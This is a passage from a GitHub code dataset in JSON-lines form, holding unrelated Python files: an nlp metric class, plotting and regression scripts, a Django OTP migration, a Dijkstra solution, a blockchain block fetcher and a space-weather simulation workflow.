version_dirnames.sort(reverse=True)\n return version_dirnames\n\n # Check and warn if other versions exist on disk\n version_dirs = _other_versions_on_disk()\n if version_dirs:\n other_version = version_dirs[0][0]\n if other_version != self._version:\n warn_msg = (\n \"Found a different version {other_version} of metric {name} in \"\n \"data_dir {data_dir}. Using currently defined version \"\n \"{cur_version}.\".format(\n other_version=str(other_version),\n name=self.name,\n data_dir=self._data_dir_root,\n cur_version=str(self._version),\n )\n )\n logger.warning(warn_msg)\n\n os.makedirs(version_data_dir, exist_ok=True)\n return version_data_dir\n\n def _get_cache_path(self, node_id):\n return os.path.join(self.data_dir, f\"{self.experiment_id}-{self.name}-{node_id}.arrow\")\n\n def finalize(self, timeout=120):\n \"\"\" Close all the writing process and load/gather the data\n from all the nodes if main node or all_process is True.\n \"\"\"\n self.writer.finalize()\n self.writer = None\n self.buf_writer = None\n self.filelock.release()\n\n if self.process_id == 0:\n # Let's acquire a lock on each node files to be sure they are finished writing\n node_files = []\n locks = []\n for node_id in range(self.num_process):\n node_file = self._get_cache_path(node_id)\n filelock = FileLock(node_file + \".lock\")\n filelock.acquire(timeout=timeout)\n node_files.append({\"filename\": node_file})\n locks.append(filelock)\n\n # Read the predictions and references\n reader = ArrowReader(path=self.data_dir, info=None)\n self.data = Dataset(**reader.read_files(node_files))\n\n # Release all of our locks\n for lock in locks:\n lock.release()\n\n def compute(self, predictions=None, references=None, timeout=120, **metrics_kwargs):\n \"\"\" Compute the metrics.\n \"\"\"\n if predictions is not None:\n self.add_batch(predictions=predictions, references=references)\n self.finalize(timeout=timeout)\n\n self.data.set_format(type=self.info.format)\n\n predictions = self.data[\"predictions\"]\n references = self.data[\"references\"]\n with temp_seed(self.seed):\n output = self._compute(predictions=predictions, references=references, **metrics_kwargs)\n return output\n\n def add_batch(self, predictions=None, references=None, **kwargs):\n \"\"\" Add a batch of predictions and references for the metric's stack.\n \"\"\"\n batch = {\"predictions\": predictions, \"references\": references}\n if self.writer is None:\n self._init_writer()\n self.writer.write_batch(batch)\n\n def add(self, prediction=None, reference=None, **kwargs):\n \"\"\" Add one prediction and reference for the metric's stack.\n \"\"\"\n example = {\"predictions\": prediction, \"references\": reference}\n example = self.info.features.encode_example(example)\n if self.writer is None:\n self._init_writer()\n self.writer.write(example)\n\n def _init_writer(self):\n if self.in_memory:\n self.buf_writer = pa.BufferOutputStream()\n self.writer = ArrowWriter(\n schema=self.arrow_schema, stream=self.buf_writer, writer_batch_size=self.writer_batch_size\n )\n else:\n self.buf_writer = None\n self.writer = ArrowWriter(\n schema=self.arrow_schema, path=self.cache_file_name, writer_batch_size=self.writer_batch_size\n )\n\n def _info(self) -> MetricInfo:\n \"\"\"Construct the MetricInfo object. 
See `MetricInfo` for details.\n\n        Warning: This function is only called once and the result is cached for all\n        following .info() calls.\n\n        Returns:\n            info: (MetricInfo) The metrics information\n        \"\"\"\n        raise NotImplementedError\n\n    def download_and_prepare(\n        self,\n        download_config: Optional[DownloadConfig] = None,\n        dl_manager: Optional[DownloadManager] = None,\n        **download_and_prepare_kwargs,\n    ):\n        \"\"\"Downloads and prepares dataset for reading.\n\n        Args:\n            download_config (Optional ``nlp.DownloadConfig``): specific download configuration parameters.\n            dl_manager (Optional ``nlp.DownloadManager``): specific Download Manager to use\n        \"\"\"\n        if dl_manager is None:\n            if download_config is None:\n                download_config = DownloadConfig()\n                download_config.cache_dir = os.path.join(self.data_dir, \"downloads\")\n                download_config.force_download = False\n\n            dl_manager = DownloadManager(\n                dataset_name=self.name, download_config=download_config, data_dir=self.data_dir\n            )\n\n        self._download_and_prepare(dl_manager)\n\n    def _download_and_prepare(self, dl_manager):\n        \"\"\"Downloads and prepares resources for the metric.\n\n        This is the internal implementation, meant to be overridden, that is called when the user\n        calls `download_and_prepare`. It should download all required resources for the metric.\n\n        Args:\n            dl_manager: (DownloadManager) `DownloadManager` used to download and cache\n                data.\n        \"\"\"\n        return None\n\n    def _compute(self, predictions=None, references=None, **kwargs) -> Dict[str, Any]:\n        \"\"\" This method defines the common API for all the metrics in the library \"\"\"\n        raise NotImplementedError\n","repo_name":"MachineLearningBCAM/Minimax-risk-classifiers-NeurIPS-2020","sub_path":"venv/lib/python3.6/site-packages/nlp/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":12080,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"36465834567","text":"from mpl_toolkits import mplot3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport ioUtils\nfrom handleColor import colorDecompact\n\n\ndef makeGraph():\n    learned = ioUtils.getLearned()\n\n    # Creating figure\n    fig = plt.figure(figsize=(10, 10))\n    ax = plt.axes(projection=\"3d\")\n    colorToMLib = {\n        \"RED\":\"red\",\n        \"ORANGE\":\"darkorange\",\n        \"YELLOW\":\"yellow\",\n        \"GREEN\":\"green\",\n        \"BLUE\":\"blue\",\n        \"PURPLE\":\"purple\",\n        \"PINK\":\"hotpink\",\n        \"BROWN\":\"brown\",\n        \"WHITE\":\"white\",\n        \"LIGHT GRAY\":\"lightgray\",\n        \"DARK GRAY\":\"darkgray\",\n        \"BLACK\":\"black\"\n    }\n    # Creating plot\n    for l in learned:\n        x = []\n        y = []\n        z = []\n        for c in learned[l]:\n            colorRgb = colorDecompact(c[0])\n            x.append(colorRgb[0])\n            y.append(colorRgb[1])\n            z.append(colorRgb[2])\n        color = \"blue\"\n        if l in colorToMLib:\n            color = colorToMLib[l]\n        ax.scatter3D(x, y, z, color=color, alpha=1)\n    ax.set_xlabel('Red')\n    ax.set_ylabel('Green')\n    ax.set_zlabel('Blue')\n    plt.savefig('graph.png', transparent=True)\n","repo_name":"Silber01/ColorLearn","sub_path":"makeGraph.py","file_name":"makeGraph.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20404942176","text":"charge2symbol={1:\"H\",2:\"He\",3:\"Li\",4:\"Be\",5:\"B\",6:\"C\",7:\"N\",8:\"O\",9:\"F\",10:\"Ne\"}\n\ndef alias_param(param_name: str, param_alias: str):\n    \"\"\"\n    Decorator for aliasing a param in a function\n    Args:\n        param_name: name of param in function to alias\n        param_alias: alias that can be used for this param\n    Returns:\n    \"\"\"\n    def decorator(func):\n        def wrapper(*args, **kwargs):\n            alias_param_value = kwargs.get(param_alias)\n            if param_alias in kwargs.keys():\n                kwargs[param_name] = alias_param_value\n                del kwargs[param_alias]\n            result = func(*args, **kwargs)\n            return result\n        return wrapper\n    return decorator\n
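\n# (added) illustrative use of alias_param -- hypothetical names, kept as comments so the module behavior is unchanged:\n#   @alias_param(param_name=\"coords\", param_alias=\"positions\")\n#   def show(coords):\n#       print(coords)\n#   show(positions=[1, 2])  # the 'positions' kwarg is renamed to 'coords' before the call\n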
\ndef printxyz(coords,al,fn):\n    atomnumber={1:\"H\",5:\"B\",6:\"C\",7:\"N\"}\n    assert len(al)==len(coords)\n    with open(fn,\"w\")as xyzf:\n        xyzf.write(str(len(al))+\" \\n\" )\n        xyzf.write(\"molecule \\n\" )\n        for i in range(len(coords)):\n            xyzf.write(atomnumber[al[i]]+\" \"+str(coords[i])[1:-1]+\"\\n\")\n    return\n\n\ndef parse_charge(dL):\n    \"\"\" There are two options: \n    1) call FcM(**kwargs,fcs=[c1,c2,--cn]) with a list of length equal to the number of atoms\n    2) FcM(**kwargs,fcs=[[aidx1,aidx2,..,aidxn],[c1,c2,..cn]]) with a list of two sublist for atoms' indexes and fract charges\n    \"\"\"\n    a=[[],[]]\n    parsed=False\n    if len(dL) ==2: # necessary, but not sufficient, for case 2\n        try:\n            assert len(dL[0])==len(dL[1])\n            if isinstance(dL[0][0],int) or isinstance(dL[0][0],float):\n                parsed=True\n        except: pass\n    if not parsed and (isinstance(dL[0],int) or isinstance(dL[0],float)): # convert to case 2 format\n        for i in range(len(dL)):\n            if dL[i]!=0:\n                a[0].append(i)\n                a[1].append(dL[i])\n        dL=a\n        parsed=True\n    if not parsed:\n        raise ValueError(\"Failed to parse charges\")\n    return dL\n\ndef DeltaV(mol,dL):\n    \"\"\"dL=[[i1,i2,i3],[c1,c2,c3]]\"\"\"\n    mol.set_rinv_orig_(mol.atom_coords()[dL[0][0]])\n    dV=mol.intor('int1e_rinv')*dL[1][0]\n    for i in range(1,len(dL[0])): \n        mol.set_rinv_orig_(mol.atom_coords()[dL[0][i]])\n        dV+=mol.intor('int1e_rinv')*dL[1][i]\n    return -dV","repo_name":"ferchault/APDFT","sub_path":"prototyping/hessian/Repository_Alchemical_Forces/AP_utils.py","file_name":"AP_utils.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"6312766545","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport otp_yubikey.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='RemoteYubikeyDevice',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('name', models.CharField(help_text='The human-readable name of this device.', max_length=64)),\n                ('confirmed', models.BooleanField(default=True, help_text='Is this device ready for use?')),\n                ('public_id', models.CharField(help_text='The public identity of the YubiKey (modhex-encoded).', max_length=32, verbose_name='Public ID')),\n            ],\n            options={\n                'abstract': False,\n                'verbose_name': 'Remote YubiKey device',\n            },\n            bases=(models.Model,),\n        ),\n        migrations.CreateModel(\n            name='ValidationService',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('name', models.CharField(help_text='The name of this validation service.', max_length=32)),\n                ('api_id', models.IntegerField(default=1, help_text='Your API ID.', verbose_name='API ID')),\n                ('api_key', models.CharField(default='', help_text='Your base64-encoded API key.', max_length=64, verbose_name='API key', blank=True)),\n                ('base_url', models.URLField(default='', help_text=\"The base URL of the verification service. 
Defaults to Yubico's hosted API.\", verbose_name='Base URL', blank=True)),\n ('api_version', models.CharField(default='2.0', help_text='The version of the validation api to use.', max_length=8, choices=[('1.0', '1.0'), ('1.1', '1.1'), ('2.0', '2.0')])),\n ('use_ssl', models.BooleanField(default=False, help_text='Use HTTPS API URLs by default?', verbose_name='Use SSL')),\n ('param_sl', models.CharField(default=None, help_text='The level of syncing required.', max_length=16, verbose_name='SL', blank=True)),\n ('param_timeout', models.CharField(default=None, help_text='The time to allow for syncing.', max_length=16, verbose_name='Timeout', blank=True)),\n ],\n options={\n 'verbose_name': 'YubiKey validation service',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='YubikeyDevice',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(help_text='The human-readable name of this device.', max_length=64)),\n ('confirmed', models.BooleanField(default=True, help_text='Is this device ready for use?')),\n ('private_id', models.CharField(default=otp_yubikey.models.default_id, help_text='The 6-byte private ID (hex-encoded).', max_length=12, verbose_name='Private ID', validators=[otp_yubikey.models.id_validator])),\n ('key', models.CharField(default=otp_yubikey.models.default_key, help_text='The 16-byte AES key shared with this YubiKey (hex-encoded).', max_length=32, validators=[otp_yubikey.models.key_validator])),\n ('session', models.PositiveIntegerField(default=0, help_text='The non-volatile session counter most recently used by this device.')),\n ('counter', models.PositiveIntegerField(default=0, help_text='The volatile session usage counter most recently used by this device.')),\n ('user', models.ForeignKey(help_text='The user that this device belongs to.', to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE)),\n ],\n options={\n 'abstract': False,\n 'verbose_name': 'Local YubiKey device',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='remoteyubikeydevice',\n name='service',\n field=models.ForeignKey(to='otp_yubikey.ValidationService', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='remoteyubikeydevice',\n name='user',\n field=models.ForeignKey(help_text='The user that this device belongs to.', to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE),\n preserve_default=True,\n ),\n ]\n","repo_name":"django-otp/django-otp-yubikey","sub_path":"src/otp_yubikey/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"7722920941","text":"#!/usr/local/bin/python3\n\nfrom sys import argv\nimport cal_course_alerts\n\ndef main():\n if len(argv) < 3:\n email = input(\"Email: \")\n courses = input(\"List course id separated by comma: \")\n else:\n email = argv[1]\n courses = argv[2]\n\n cal_course_alerts.alert(email, courses)\n\nif __name__ == '__main__':\n main()\n","repo_name":"adelaide-chen/check-class-status","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74152871147","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import 
linear_model\nfrom sklearn.metrics import mean_squared_error\n\n\n\n\nWineQualityDF = pd.read_csv('Python_Lesson5/winequality-red.csv')\n\n\n#Drop missing data\ndata = WineQualityDF.select_dtypes(include=[np.number]).interpolate().dropna()\n\n#Check Data\nprint(WineQualityDF.quality.describe())\n\n#Check for Skewness -- Skewness is approximately symmetric\nprint (\"Skew is:\", WineQualityDF.quality.skew())\n#plt.hist(WineQualityDF.quality, color='blue')\n#plt.show()\n\n#Correlation -- alchohol, volatile acidity, and sulphates are the 3 highest correlated features\nnumeric_features = WineQualityDF.select_dtypes(include=[np.number])\ncorr = numeric_features.corr()\nprint(corr['quality'],'\\n') \n\n#Build Linear Model\ny = WineQualityDF.quality\nX = data[['alcohol','volatile acidity', 'sulphates']]\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.33)\nlr = linear_model.LinearRegression()\nmodel = lr.fit(X_train, y_train)\n\n#R2 Score\nprint (\"R^2 is: \\n\", model.score(X_test, y_test))\n\n#RMSE\npredictions = model.predict(X_test)\nprint ('RMSE is: \\n', mean_squared_error(y_test, predictions))\n\n##visualize\n\nactual_values = y_test\nplt.scatter(predictions, actual_values, alpha=0.25, color='b') #alpha helps to show overlapping data\nplt.xlabel('Predicted Quality')\nplt.ylabel('Actual Quality')\nplt.title('Linear Regression Model')\nplt.show()\n\n\n","repo_name":"zshinyg/CSEE5590","sub_path":"Python_Lesson5/Python_Lesson5_ICP/Prob2.py","file_name":"Prob2.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33254534082","text":"from init import bilstm\nfrom fasttext import fasttexts\nfrom rnn import deepModel, Finisher\nfrom gruwithft import gruwithft\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import KFold\nfrom keras.utils.np_utils import to_categorical # convert to one-hot-encoding\n\nEMBEDDING_FILE = '/home/students/student3_2a/nsdc/text/glove.840B.300d.txt'\ntrain_x = pd.read_csv('/home/students/student3_2a/nsdc/text/train.csv')\ntest_x = pd.read_csv('/home/students/student3_2a/nsdc/text/test.csv')\n\n\n\nmax_features=80000\nmaxlen=150\nembed_size=300\n\nx_train = train_x['title'].fillna(' ')\ntrain_y = train_x['Category'].values\ny_train = to_categorical(train_y)\n\n\ntest_x['title'].fillna(' ')\n\nx_test = test_x['title'].str.lower()\n\n\n# # Vectorize text + Prepare GloVe Embedding\n# tokenizer = text.Tokenizer(num_words=max_features, lower=True)\n# tokenizer.fit_on_texts(list(train_x))\n\n# train_x = tokenizer.texts_to_sequences(train_x)\n# test_x = tokenizer.texts_to_sequences(test_x)\n\n# x_train = sequence.pad_sequences(train_x, maxlen=maxlen)\n# x_test = sequence.pad_sequences(test_x, maxlen=maxlen)\n\nclass Ensemble():\n def __init__(self, n_folds, stacker, base_models):\n self.n_folds = n_folds\n self.stacker = stacker\n self.base_models = base_models\n def fit_predict(self, X, y, T):\n \n folds = list(KFold(n_splits=self.n_folds, shuffle=True, random_state=2017).split(X))\n S_train = np.zeros((X.shape[0], 58*len(self.base_models)))\n S_test = []\n final_test = np.empty((T.shape[0],58*len(self.base_models)))\n for i, clf in enumerate(self.base_models):\n for j, (train_idx, test_idx) in enumerate(folds):\n print(train_idx)\n print(\"On {}{}\".format(i,j))\n X_train = X[train_idx]\n y_train = y[train_idx]\n X_holdout = X[test_idx]\n y_pred, y_test = 
clf.run(X_train,y_train,X_holdout,T)[:]\n S_train[test_idx, i*58:i*58+58] = y_pred\n S_test.append(y_test)\n final_test[:,i*58:i*58+58] = np.mean(np.array(S_test), axis=0)\n return self.stacker.finish(np.expand_dims(S_train, axis=2), y, np.expand_dims(final_test, axis=2))[:]\n\ngo = Ensemble(5, Finisher((174,1)), [bilstm(),deepModel(),gruwithft()])\ngo.fit_predict(x_train, y_train, x_test)\n","repo_name":"llllxt/Product-Classification","sub_path":"text/stacking/ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19143410024","text":"import pyximport; pyximport.install()\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n\ndef main():\n work_dir = 'final-long-running-test'\n\n # Plot general loss\n plot(os.path.join(work_dir, 'loss.csv'), 0, -1, loss_label='Gesamter Fehler')\n plot(os.path.join(work_dir, 'loss_prob.csv'), 0, -1, loss_label='Prob Fehler')\n\n # Plot reg loss\n plot(os.path.join(work_dir, 'loss_reg.csv'), 0, -1, loss_label='L2 Regulierungs Fehler', y_lim=(0.49, 0.55))\n plot(os.path.join(work_dir, 'loss_reg.csv'), 100, 500, loss_label='L2 Regulierungs Fehler', y_lim=(0.49, 0.55))\n\n\ndef plot(stats_file, lower_bound, upper_bound, smoothing=0.9, loss_label='Fehler', y_lim=None):\n x_scaling = 1 / 1000 # Show thousands on x axis\n\n stats = np.loadtxt(stats_file, skiprows=1, delimiter=',')\n stats = np.transpose(stats) # Change axis for easy selection\n x_steps = stats[1][lower_bound:upper_bound] * x_scaling\n y_loss = stats[2][lower_bound:upper_bound]\n\n smoothed_loss = [y_loss[0]]\n for i in range(1, len(y_loss)):\n smoothed_loss.append(smoothing * smoothed_loss[i - 1] + (1 - smoothing) * y_loss[i])\n\n plt.plot(x_steps, y_loss, alpha=0.4)\n plt.plot(x_steps, smoothed_loss)\n if y_lim:\n plt.ylim(y_lim)\n plt.xlabel('Batch (in 1000)')\n plt.ylabel(loss_label)\n\n # Markers for important part\n plt.axvline(x=1500000 * x_scaling, color='r')\n plt.axvline(x=2100000 * x_scaling, color='r')\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"FritzFlorian/bachelor-thesis-code","sub_path":"reversialphazero/distributed_8_by_8/plot_losses.py","file_name":"plot_losses.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29481319436","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nfrom setuptools import setup\n\n\ntry:\n long_description = open(b'README.rst', 'rt').read()\nexcept IOError:\n long_description = \"\"\n\ntry:\n long_description += open(b'ChangeLog.rst', 'rt').read().strip()\nexcept IOError:\n pass\n\n\nMODULE_PATH = os.path.join(os.getcwd(), \"encrypted_id\", \"__init__.py\")\n\n\ndef find_this(search, filename=MODULE_PATH):\n \"\"\"Take a string and a filename path string and return the found value.\"\"\"\n if not search:\n return\n for line in open(str(filename)).readlines():\n if search.lower() in line.lower():\n line = line.split(\"=\")[1].strip()\n if \"'\" in line or '\"' in line or '\"\"\"' in line:\n line = line.replace(\"'\", \"\").replace('\"', '').replace('\"\"\"', '')\n return line\n\n\nprint(find_this(\"__version__\"))\n\nsetup(\n name=\"django-encrypted-id\",\n description=\"Encrypted IDs for Django Models\",\n long_description=long_description,\n\n 
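# (added note) the metadata fields below are parsed out of encrypted_id/__init__.py by find_this() defined above\n    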
version=find_this(\"__version__\"),\n\n author=find_this(\"__author__\"),\n author_email=find_this(\"__email__\"),\n maintainer=find_this(\"__author__\"),\n maintainer_email=find_this(\"__email__\"),\n\n url=find_this(\"__source__\"),\n license=find_this(\"__license__\"),\n\n\n install_requires=[\n \"Django>=1.8\", \"pycryptodomex\",\n ],\n\n\n packages=[\"encrypted_id\"],\n zip_safe=True,\n\n\n keywords=['Django', 'Web'],\n\n\n classifiers=[\n\n 'Development Status :: 5 - Production/Stable',\n\n 'Intended Audience :: Developers',\n 'Intended Audience :: End Users/Desktop',\n 'Intended Audience :: System Administrators',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: Other Audience',\n\n 'Natural Language :: English',\n\n 'Operating System :: OS Independent',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: MacOS :: MacOS X',\n\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n\n 'Programming Language :: Python :: Implementation :: CPython',\n\n 'Topic :: Software Development',\n\n ],\n)\n","repo_name":"amitu/django-encrypted-id","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"37"} +{"seq_id":"22103443151","text":"##輸入小於255的數字##\n\nnum = 256\nwhile num > 255:\n num = eval(input('輸入一個十進位的數字: '))\n if num <= 255:\n break\nprint('十進位:', num)\n\n##轉為2進位##\n\n# 計算出二進位數字\nbinary_num_2 = []\nmod_num_2 = []\nbinary_num_2.append(num // (2**(7)))\nmod_num_2.append(num % (2**(7)))\n\nfor i in range(7):\n binary_num_2.append(mod_num_2[i] // (2**(6-i)))\n mod_num_2.append(mod_num_2[i] % (2**(6-i)))\n\n# 去除開頭的0\n\nfor j in range(len(binary_num_2)):\n if binary_num_2[0] == 0:\n binary_num_2.pop(0)\n else:\n break\n\n# 列出數字\nprint('二進位: ', end='')\nfor k in range(len(binary_num_2)):\n print(binary_num_2[k], end='')\n\n\n##轉為16進位##\n\nbit_16 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 'A', 'B', 'C', 'D', 'E', 'F']\nbit_2 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n\n# 計算出16進位數字\nbinary_num_16 = []\nmod_num_16 = []\nbinary_num_16.append(num // (16**(1)))\nmod_num_16.append(num % (16**(1)))\nbinary_num_16.append(mod_num_16[0] // (16**(0)))\nmod_num_16.append(mod_num_16[0] % (16**(0)))\n\n# 去除開頭的0\n\nfor j in range(len(binary_num_16)):\n if binary_num_16[0] == 0:\n binary_num_16.pop(0)\n else:\n break\n\n# 將大於10的數字更換成字母\n\nfor j in range(len(binary_num_16)):\n binary_num_16[j] = bit_16[bit_2.index(binary_num_16[j])]\n\n# 列出數字\nprint('')\nprint('16進位: ', end='')\nfor k in range(len(binary_num_16)):\n print(binary_num_16[k], end='')\n\n \n \n \n \n \n# 輸出結果: \n# PS C:\\Users\\bruce\\vscode\\code> & C:/Users/bruce/AppData/Local/Programs/Python/Python38/python.exe c:/Users/bruce/vscode/code/converter.py\n# 輸入一個十進位的數字: 234\n# 十進位: 234\n# 二進位: 11101010\n# 16進位: EA\n\n","repo_name":"bruce0512/Basic_Data_structure_and_Algorithms","sub_path":"hw1_binary_hex_converter.py","file_name":"hw1_binary_hex_converter.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3605666061","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nV,E = map(int,input().split())\nstart = int(input())\ngraph = [[] for _ in range(V+1)] # 그래프 정보를 넣어줄 리스트 선언\ndistance = [INF]*(V+1) # 최단경로 리스트 선언\nvisited = [False]*(V+1) # 방문표시 리스트 
\nfor i in range(E) :\n    u,v,w = map(int,input().split())\n    graph[u].append((v,w)) # edge from u to v with cost w\n\ndef dijkstra(start) :\n    q = [] # min-heap of (distance, node) pairs\n    distance[start] = 0 # the shortest path from start to itself costs 0\n    heapq.heappush(q,(0,start)) # push the (distance, node) pair onto the heap\n    while q :\n        # pop the node with the smallest tentative distance\n        dist, now = heapq.heappop(q)\n        if distance[now] < dist :\n            continue\n        for i in graph[now] :\n            cost = dist + i[1]\n            if cost < distance[i[0]] :\n                distance[i[0]] = cost\n                heapq.heappush(q,(cost,i[0]))\n\ndijkstra(start)\n\nfor i in range(1,V+1) :\n    if distance[i] == INF :\n        print(\"INF\")\n    else :\n        print(distance[i])","repo_name":"kiki249049/Baekjoon","sub_path":"백준/Gold/1753. 최단경로/최단경로.py","file_name":"최단경로.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43309883203","text":"import datetime\nfrom mainPage.models import Block\nimport requests\n\n\ndef fetch_blocs(date=None):\n\t# resolve the default at call time; a default argument expression would be frozen at import time\n\tif date is None:\n\t\tdate = datetime.date.today().isoformat()\n\turl = 'https://bcschain.info/api/blocks?date={}'.format(date)\n\tresponse = requests.get(url)\n\tblocks = response.json()\n\tfor block in blocks:\n\t\tblock_to_save = Block(\n\t\t\thash=block['hash'],\n\t\t\theight=block['height'],\n\t\t\ttimestamp=block['timestamp'],\n\t\t\tiso_timestamp=datetime.datetime.utcfromtimestamp(block['timestamp']),\n\t\t\tinterval=block['interval'],\n\t\t\tsize=block['size'],\n\t\t\ttransactionCount=block['transactionCount'],\n\t\t\tminer=block['miner'],\n\t\t\treward=block['reward'],\n\t\t)\n\t\tif not Block.objects.filter(hash=block['hash']).exists():\n\t\t\tblock_to_save.save()\n\n","repo_name":"hungryhost/bcs_test_app","sub_path":"bcsproject/helpers/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29568015513","text":"import sys\n#sys.path.append(\"../\")\nfrom manager import workflow\nimport os\nimport pony.orm as pny\nimport datetime\nimport time\nimport json\nfrom base64 import b64decode\nfrom Database import LocalDataStorage\nfrom Database.workflow import Simulation, Incident\n#from DataManager.client import registerDataWithDM, putByteDataViaDM, DataManagerException\nfrom DataManager.client import moveDataViaDM, DataManagerException, getInfoForDataInDM, putByteDataViaDM, registerDataWithDM, copyDataViaDM, getLocalFilePathPrepend\nfrom SimulationManager.client import createSimulation, submitSimulation, SimulationManagerException\nfrom ExternalDataInterface.client import registerEndpoint, ExternalDataInterfaceException, removeEndpoint\n\n# create and submit jobs\ndef _launch_simulation(msg, callback='spaceweather_postprocess'):\n    print(\"\\nSpaceweather simulation submit handler\")\n    IncidentID = msg[\"IncidentID\"]\n    CaseName = msg['SimulationCase']\n    ParaViewAddress = msg['ParaViewAddress']\n    ParaViewPort = msg['ParaViewPort']\n    print(msg)\n    if CaseName is None:\n        print('Case name is none!')\n        return\n\n    try:\n        callbacks = { 'COMPLETED': callback }\n        sim_id = createSimulation(IncidentID,\n                                  1,\n                                  '00:15:00',\n                                  CaseName,\n                                  'run_spaceweather.sh %s %s %d' % (CaseName, ParaViewAddress, ParaViewPort),\n                                  callbacks,\n                                  template_dir='template_'+CaseName)\n        submitSimulation(sim_id)\n    except SimulationManagerException as err:\n        print(\"Error creating or submitting simulation \"+err.message)\n        return\n\n@workflow.handler\ndef iPIC3D_2D_B0z0_0(msg):\n    print(\"\\nSpaceweather base simulation\")\n    IncidentId = msg[\"IncidentID\"]\n    
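# the 'COMPLETED' callback registered by _launch_simulation re-enters this workflow on\n    # the 'spaceweather_postprocess' queue, so the explicit send below is only a dummy connection\n    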
try:\n        _launch_simulation(msg)\n        workflow.send(queue=\"spaceweather_postprocess\", message=msg) # dummy connection\n    except Exception as e:\n        print('Error launching base case ' + str(e))\n\n@workflow.handler\ndef iPIC3D_2D_B0z0_0195(msg):\n    print(\"\\nSpaceweather B0z 0.0195 simulation\")\n    IncidentId = msg[\"IncidentID\"]\n    try:\n        _launch_simulation(msg)\n        workflow.send(queue=\"spaceweather_postprocess\", message=msg) # dummy connection\n    except Exception as e:\n        print('Error launching B0z 0.0195 case ' + str(e))\n\n@workflow.handler\ndef iPIC3D_2D_B0z0_00975(msg):\n    print(\"\\nSpaceweather B0z 0.00975 simulation\")\n    IncidentId = msg[\"IncidentID\"]\n    try:\n        _launch_simulation(msg)\n        workflow.send(queue=\"spaceweather_postprocess\", message=msg) # dummy connection\n    except Exception as e:\n        print('Error launching B0z 0.00975 case ' + str(e))\n\n@workflow.handler\ndef iPIC3D_2D_B0z0_039(msg):\n    print(\"\\nSpaceweather B0z 0.039 simulation\")\n    IncidentId = msg[\"IncidentID\"]\n    try:\n        _launch_simulation(msg)\n        workflow.send(queue=\"spaceweather_postprocess\", message=msg) # dummy connection\n    except Exception as e:\n        print('Error launching B0z 0.039 case ' + str(e))\n    \n# space weather init\n@workflow.handler\ndef spaceweather_init(msg):\n    print(\"\\nSpaceweather simulation init handler\")\n    IncidentID = msg[\"IncidentID\"]\n\n    #workflow.setIncidentActive(IncidentID)\n    pv_address = os.environ['PV_ADDRESS'] if 'PV_ADDRESS' in os.environ else 'steven-XPS-13-9370'\n\n    msg['SimulationCase'] = '2D_B0z0.039'\n    msg['ParaViewAddress'] = pv_address\n    msg['ParaViewPort'] = 22228\n    